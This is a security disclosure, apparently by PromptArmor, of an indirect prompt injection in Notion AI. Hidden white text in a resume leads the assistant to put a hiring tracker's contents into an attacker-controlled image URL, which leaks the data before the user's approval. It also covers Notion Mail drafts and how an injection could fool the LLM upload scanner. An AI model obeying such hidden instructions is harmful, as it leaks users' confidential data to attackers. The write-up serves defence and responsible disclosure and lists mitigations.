Threat Intelligence

Table of Content

Table of Content

Table of Content

Notion AI: Data Exfiltration

Notion AI is susceptible to data exfiltration via indirect prompt injection due to a vulnerability in which AI document edits are saved before user approval. UPDATE Jan 8th: It seems our initial disclosure was triaged by the HackerOne team before it reached the Notion team. Once Notion was aware of this, they took swift and immediate action and were able to confirm the vulnerability; and Notion has confirmed that the remediation is in production!

This hit the top of HackerNews! To view the discussion,

.

This hit the top of HackerNews! To view the discussion,

.

This hit the top of HackerNews! To view the discussion,

.

Notion AI is susceptible to data exfiltration via indirect prompt injection due to a vulnerability in which AI document edits are saved before user approval.

Notion AI allows users to interact with their documents using natural language… but what happens when AI edits are made prior to user approval?

In this article, we document a vulnerability that leads Notion AI to exfiltrate user data (a sensitive hiring tracker document) via indirect prompt injection. Users are warned about an untrusted URL and asked for approval to interact with it - but their data is exfiltrated before they even respond.

We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.

Stealing Hiring Tracker Data with a Poisoned Resume

  1. The user uploads a resume (untrusted data) to their chat session.
    Here, the untrusted data source is a resume PDF, but a prompt injection could be stored in a web page, connected data source, or a Notion page.

    A prompt injection is concealed within a resume in whitespace between the candidate's title and their contact information.

    This document contains a prompt injection hidden in 1 point font white on white text with a square white image covering the text for good measure. The LLM can read it with no issues, but the document appears benign to the human eye.


    A Note on Defenses: Notion AI uses an LLM to scan document uploads and present a warning if a document is flagged as malicious. As this warning is triggered by an LLM, it can be bypassed by a prompt injection that convinces the evaluating model that the document is safe. For this research, we did not focus on bypassing this warning because the point of the attack is the exfiltration mechanism, not the method of injection delivery. In practice, an injection could easily be stored in a source that does not appear to be scanned, such as a web page, Notion page, or connected data source like Notion Mail.


  2. The user asks Notion AI for help updating a hiring tracker based on the resume.

    Notion interface with a hiring tracker document open on the left and Notion AI chat on the right. The user has attached a resume document to the chat and is asking 'Hey - please help me update the notes for the candidate'.


  3. Notion AI is manipulated by the prompt injection to insert a malicious image into the hiring tracker.
    The prompt injection manipulates Notion AI to (1) construct a URL by collecting all of the text in the document and appending the data to an attacker-controlled domain, and (2) insert an ‘image’ into the Notion Page using the constructed URL as the image source. 

    Notion AI displays a warning to the user, asking if they trust an external site. The URL shown contains data from the user's hiring tracker.

    Here, it appears as though the user is prompted for approval. However, unbeknownst to the user, the edit has already occurred before the user is prompted for approval. When the edit occurred, the user’s browser made a request to the attacker’s server, attempting to retrieve the image. This request exfiltrates the document contents contained in the URL constructed by Notion AI.

    Whether or not the user accepts the edit, the attacker successfully exfiltrates the data.

  4. The attacker reads the sensitive hiring tracker data from their server logs.
    Once the user’s browser has made a request for the malicious image, the attacker can read the sensitive data contained in the URL from their request logs.

    The attacker's server logs hold data from the hiring tracker including salary expectations, candidate notes, and other internal data.

    In this attack, exfiltrated data included salary expectations, candidate feedback, internal role details, and other sensitive information such as diversity hiring goals.

Additional Attack Surface

The Notion Mail AI drafting assistant is susceptible to rendering insecure Markdown images within email drafts, resulting in data exfiltration. If a user mentions an untrusted resource while drafting, content from the user’s query or other mentioned resources can be exfiltrated.  E.g., “Hey, draft me an email based on @untrusted_notion_page and @trusted_notion_page”.

The attack surface is reduced for Notion Mail’s drafting assistant as the system appears to only have access to data sources within the Notion ecosystem that are explicitly mentioned by the user (as opposed to Notion AI’s main offering, which supports web search, document upload, integrations, etc.).

  1. Institute a vetting process for connected data sources. Restrict use of connectors that can access highly sensitive or highly untrusted data from: Settings > Notion AI > Connectors.

  2. To reduce the risk of untrusted data being processed in the workspace, admins can configure: Settings > Notion AI > AI Web Search > Enable web search for workspace > Off.

  3. Individual users should avoid including sensitive personal data that could be leveraged in a spearphishing attack when configuring personalization for Notion AI via: Settings > Notion AI > Personalization.

  4. Individual users can configure: Settings > Notion AI > AI Web Search > Require confirmation for web requests > On.

Note: Implementing these remediations will reduce the risk surface, but will not nullify the core vulnerability.

  1. Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI page creation or update outputs without explicit user approval.

  2. Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI mail drafts.

  3. Implement a strong Content Security Policy. This will prevent network requests from being made to unapproved external domains.

  4. Ensure the CDN used to retrieve images for display in Notion and image previews for display in Notion Mail cannot be used as an open redirect to bypass the CSP policy that is set.

Responsible Disclosure Timeline

12/24/2025 Initial report made via HackerOne
12/24/2025 Report is acknowledged, altered write-up requested
12/24/2025 PromptArmor follows up with the requested format
12/29/2025 Report closed as non-applicable
01/07/2026 Public disclosure